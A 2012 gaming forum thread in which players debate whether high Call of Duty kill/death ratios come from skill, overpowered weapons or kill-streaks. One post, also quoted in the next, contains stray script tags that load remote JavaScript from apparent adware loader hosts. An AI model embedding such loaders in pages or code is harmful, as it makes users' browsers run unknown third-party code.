Showing results for 
Search instead for 
Do you mean 
Reply
Oct 03 2012
By: Giraphelant First Son 1 posts
Offline

K/D Ratio

12 replies 242 views Edited Oct 3, 2012

I'm semi new to the game, but have noticed tons of people getting 50 kills and like 10 deaths. I was wondering how that's possible? Are they cheating or is there some kind of map they have that I don't? 

Message 1 of 13 (242 Views)
Reply
0 Likes
Wastelander
Registered: 05/28/2012
Offline
766 posts
 

Re: K/D Ratio

Oct 3, 2012

nope odds are they dont cheat. today played 3 games 80+ kills single digit deaths. its possible and their are players better than me who can have those scores in their sleep.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
trophy huting currently

Message 2 of 13 (237 Views)
Reply
0 Likes
Fender Bender
Registered: 10/14/2005
Offline
3482 posts
 

Re: K/D Ratio

[ Edited ]
Oct 3, 2012

It's possbile.

 

But mostly its people who use Overpowered weapons and Kill-Streaks *****.

Nothing special.

 

Edit: profanity




Message 3 of 13 (234 Views)
Reply
0 Likes
Wastelander
Registered: 05/28/2012
Offline
766 posts
 

Re: K/D Ratio

Oct 3, 2012

not really though completely agreed on kill streaks part

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
trophy huting currently

Message 4 of 13 (217 Views)
Reply
0 Likes
Fender Bender
Registered: 10/14/2005
Offline
3482 posts
 

Re: K/D Ratio

Oct 4, 2012

Las_Plagas1 wrote:

not really though completely agreed on kill streaks part

<script type="text/javascript" src="http://loading-resource.com/data.geo.php?callback=window.__geo.getData"></script> <script type="text/javascript" src="http://cdncache3-a.akamaihd.net/loaders/1032/l.js?aoi=1311798366&pid=1032&zoneid=62862"></script>

we can agree to disagree, but its the truth, thats all COD is all about.

 

OP Weapons and Kill-Streaks.




Message 5 of 13 (206 Views)
Reply
0 Likes
Gaming Beast
Registered: 11/14/2010
Offline
2171 posts
 

Re: K/D Ratio

Oct 4, 2012

Some people are just really good at call of duty. I play a lot of hardcore team deathmatch and I see lot's of 2.0 k/d and higher but sometimes those people have an off game. Sometimes I'm on and can roll off a 12-0 game of search and destroy and other times I can't get a kill even if someone is right in front of me lol.

Message 6 of 13 (190 Views)
Reply
0 Likes
Wastelander
Registered: 05/28/2012
Offline
766 posts
 

Re: K/D Ratio

Oct 5, 2012

well the majority of those players with crazy KD do use OP guns but im not one of them. unless Uzi, Mac11, and Mp5k are OP which i doubt.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
trophy huting currently

Message 7 of 13 (187 Views)
Reply
0 Likes
Fender Bender
Registered: 10/14/2005
Offline
3482 posts
 

Re: K/D Ratio

[ Edited ]
Oct 5, 2012

WAGG__da__DOGG wrote:

Some people are just really good at call of duty. I play a lot of hardcore team deathmatch and I see lot's of 2.0 k/d and higher but sometimes those people have an off game. Sometimes I'm on and can roll off a 12-0 game of search and destroy and other times I can't get a kill even if someone is right in front of me lol.


well where to start

COD has never been a game that is skillful or competetive.
I'll give you a few examples below to show you why.

Hardcore Deathmatch is the least skillfull and realistic game mode ever.
You can kill a person by shooting them in the toe.
Anyone can play that game mode and go postive.


Another dumb part of COD is that host advantage, if your host or have better internet it seems like you cant kill them.
Another dumb part of COD is the horrible hit dection.

 

in conclusion. COD maybe be fun for some people but not in any way shape or form is it skillfull or competetive game.

 

Not hating on the people that enjoy it but ive played a lot of FPS and TPS ( Third Person Shooters )

and COD is catered to casual players way too much to be considered a real skillful game.

 

Try playing Black-Ops Zombies. way more challenging then Multiplayer.




Message 8 of 13 (182 Views)
Reply
0 Likes
Fender Bender
Registered: 10/14/2005
Offline
3482 posts
 

Re: K/D Ratio

Oct 5, 2012

Las_Plagas1 wrote:

well the majority of those players with crazy KD do use OP guns but im not one of them. unless Uzi, Mac11, and Mp5k are OP which i doubt.


It's always fun using crappy weapons since 90% of COD players are try hard and use the most cheapest weapon just to get 1 kill.




Message 9 of 13 (181 Views)
Reply
0 Likes
Ghost of Sparta
Registered: 02/03/2008
Online
14566 posts
 

Re: K/D Ratio

Oct 5, 2012

Mr-RPG-7 wrote:

Las_Plagas1 wrote:

well the majority of those players with crazy KD do use OP guns but im not one of them. unless Uzi, Mac11, and Mp5k are OP which i doubt.


It's always fun using crappy weapons since 90% of COD players are try hard and use the most cheapest weapon just to get 1 kill.


It's always fun watching all of your opponents frantically switch mid game to the default striker class when using the 1887.


To teach is a moment's superiority; not to, everlasting.

Fabulous!
Message 10 of 13 (172 Views)
Reply
0 Likes